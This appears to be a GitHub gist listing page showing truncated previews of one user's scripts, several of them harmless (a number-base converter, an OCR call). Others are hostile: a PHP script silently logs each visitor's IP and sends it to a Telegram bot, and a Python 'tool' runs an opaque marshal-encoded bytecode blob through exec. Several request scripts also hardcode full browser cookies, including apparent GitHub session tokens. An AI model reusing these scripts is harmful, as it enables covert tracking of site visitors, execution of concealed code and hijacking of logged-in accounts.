This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var text=document.getElementById("text"),rest=document.getElementById("result"),number="",numberI=0;function BinToDec(){numberI=0;var e=number="",n=1;if(number=text.value,numberI=parseInt(number),isNaN(numberI))rest.innerHTML="Something is wrong";else{numberI=0;for(var r=number.length-1;0<=r;r--)e=number.charAt(r),numberI+=parseInt(e)*n,n*=2;rest.innerHTML=numberI}}function BinToHex(){var e,n=1,r="",u=" ";if(number="",numberI=0,number=text.value,numberI=parseInt(number),isNaN(numberI))rest.innerHTML="Something is wrong";else{for(numberI=0;number.length%4!=0;)number="0"+number;for(var m=number.length-4;0<=m;m-=4){for(var b=(r=number.substr(m,4)).length-1;0<=b;b--)e=r.charAt(b),numberI+=parseInt(e)*n,n*=2,console;numberI<10&&(u=numberI+u),10==numberI&&(u="A"+u),11==numberI&&(u="B"+u),12==numberI&&(u="C"+u),13==numberI&&(u="D"+u),14==numberI&&(u="E"+u),15==numberI&&(u="F"+u),n=1,numberI=0}rest.innerHTML=u}}function DecToBin(){var e="";if(number="",numberI=0,number=text.value,numberI=parseInt(number),isNaN(number |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
error_reporting(0); | |
$image = new CURLFILE("image.png"); // image location (Host the image using any online image hoster) | |
$api = 'API Key Here'; // go to https://ocr.space and make your free api key and put it in the $api section (: | |
$language = 'ar'; // use *ar* for convert arabic text, use *en* for convert englih text | |
$mode = ( $language == 'ar' ) ? $lang = 'ara' : 'eng'; | |
Function ocr($image, $api, $mode) | |
{ | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time | |
import requests | |
import random | |
from colorama import Fore | |
s = Fore.RED | |
m = Fore.BLUE | |
a = Fore.GREEN | |
p = Fore.BLACK | |
r = Fore.CYAN |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
########################Free-Software######################### | |
# Please don't use it for illegal things # | |
# I AM NOT "REASONABLE" FOR ANY WRONG USE!! # | |
# Made with love by iNaWaR <3 # | |
############################################################## | |
import socket,uuid,re,psutil,threading | |
import os | |
import json |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$ip_target = $_SERVER['HTTP_CLIENT_IP'] ? $_SERVER['HTTP_CLIENT_IP'] : ($_SERVER['HTTP_X_FORWARDED_FOR'] ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']); | |
$bot_token = "Your Telegram bot Token here"; | |
$chatid = "Your Telegram ID here"; | |
sendMessage($chatid, '✳ IP : ' . $ip_target, $bot_token); | |
function sendMessage($chatID, $messaggio, $bot_token) { | |
$url = "https://api.telegram.org/bot" . $bot_token . "/sendMessage?chat_id=" . $chatID; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Tool is encrypted to protect rights!! | |
import marshal | |
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s\xc8\x00\x00\x00d\x00d\x01l\x00T\x00d\x00d\x02l\x01Z\x01d\x00d\x02l\x02Z\x02d\x00d\x02l\x03Z\x03d\x00d\x03l\x04m\x04Z\x04\x01\x00e\x05e\x06j\x07d\x04\x17\x00\x83\x01\x01\x00e\x02\xa0\x08\xa1\x00Z\td\x05d\x06\x84\x00Z\nd\x07d\x08\x84\x00Z\x0bd\td\n\x84\x00Z\x0cd\x0bd\x0c\x84\x00Z\re\x0ed\r\x83\x01Z\x0fe\x0fd\x0ek\x02r\x84e\x0ed\x0f\x83\x01Z\x10e\x0ce\x10\x83\x01\x01\x00n@e\x0fd\x10k\x02r\xa8e\x11d\x11d\x12\x83\x02\xa0\x12\xa1\x00\xa0\x13\xa1\x00Z\x14e\re\x14\x83\x01\x01\x00n\x1ce\x05e\x06j\x15d\x13\x17\x00\x83\x01\x01\x00e\x05e\x06j\x16d\x14\x17\x00\x83\x01\x01\x00d\x02S\x00)\x15\xe9\x00\x00\x00\x00)\x01\xda\x01*N)\x01\xda\x04tqdmu\xe0\x03\x00\x00\n \xf0\x9d\x91\xac\xf0\x9d\x91\xb5\xf0\x9d\x91\xac\xf0\x9d\x91\xb9\xf0\x9d\x91\xae\xf0\x9d\x92\x80\n \xf0\x9d\x91\xac\xf0\x9d\x91\xb5\xf0\x9d\x91\xac\xf0\x9 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from colorama import * | |
import socket | |
target = input(Fore.RED+"Put the target's URL: ") | |
Fore.YELLOW | |
Fore.RED | |
def get_ip (target): | |
iN = target.split(".com")[0] | |
iN2 = iN.replace("http://", "") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
head = { | |
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', | |
'accept-encoding': 'gzip, deflate, br', | |
'accept-language': 'en-US,en;q=0.9', | |
'cookie': '_device_id=d19a3adf483dc8e7f363b2ba85577c74; _octo=GH1.1.336579755.1638284782; has_recent_activity=1; user_session=GBE2KZz0JLLmNhOYPgPHDaNdl2l_8hOuyvWFhPt84QbL24sK; __Host-user_session_same_site=GBE2KZz0JLLmNhOYPgPHDaNdl2l_8hOuyvWFhPt84QbL24sK; logged_in=yes; dotcom_user=nawar222; color_mode=%7B%22color_mode%22%3A%22auto%22%2C%22light_theme%22%3A%7B%22name%22%3A%22light%22%2C%22color_mode%22%3A%22light%22%7D%2C%22dark_theme%22%3A%7B%22name%22%3A%22dark%22%2C%22color_mode%22%3A%22dark%22%7D%7D; tz=Europe%2FBerlin; _gh_sess=FsONnZEWPaJ5U%2B0M4xCIN%2FuE73YFE92v2lq8UY%2B%2BFw0X1LDKGQX2zPge9cXfO%2FNUD7RSb9MtLRMrwW7dblrDv0NcC7P%2BTzZWgUOgqFZ0PNYxFOArrXU5my%2BWLGrtkKwTzAbJtHXJ4Cdl7bfyI6wFrbsgmD%2FkNlogARyHkyXjU1I%3D--sIXeCKS9ycMvLx0h--SMmj5fsKRk3WLc0quoy16Q%3D%3D', | |
'se |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import time | |
from colorama import Fore | |
headers = { | |
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', | |
'accept-encoding': 'gzip, deflate, br', | |
'accept-language': 'en-US,en;q=0.9', | |
'cookie': 'AMCV_F207D74D549850760A4C98C6%40AdobeOrg=-1124106680%7CMCMID%7C30930492835502827258194776402433686967%7CvVersion%7C5.2.0; _rdt_uuid=1638095316590.f6f2b803-54cc-40f3-987c-8a8eb4b42a84; _cs_c=0; _cs_id=f8e17f99-15c4-a5a4-b127-379a40296dd5.1638095318.1.1638095318.1638095318.1.1672259318949; _fbp=fb.1.1638095319390.891772472; _gcl_au=1.1.1128413055.1638095319; _mkto_trk=id:156-OFN-742&token:_mch-nvidia.com-1638095319347-86701; mbox=PC#42c830dd08ee44eea02eb0dbb0550cf0.37_0#1705609703|session#058bc948af0742b6819f08f8e4d6080e#1642366763; s_getNewRepeat=1642364902192-Repeat', | |
'sec-ch-ua': '" Not;A Brand";v="99", "Microsoft Edge";v="97", "Chromium";v="97"', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import time | |
header = { | |
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', | |
'accept-encoding': 'gzip, deflate, br', | |
'accept-language': 'en-US,en;q=0.9', | |
'cookie': 'GuestData=UserID=-1383991535; RBXEventTrackerV2=CreateDate=1/8/2022 5:26:54 PM&rbxid=3210521638&browserid=124494138220; rbx-ip2=; RBXImageCache=timg=37376434353835342D343837382D346337362D396634382D6465383238393231326439362538372E3135342E3132302E31303225312F382F323032322031313A30343A313420504D96CD5DB2BCBE3E6623F9B5DCE3851B511345BB70', | |
'sec-ch-ua': '" Not;A Brand";v="99", "Microsoft Edge";v="97", "Chromium";v="97"', |
NewerOlder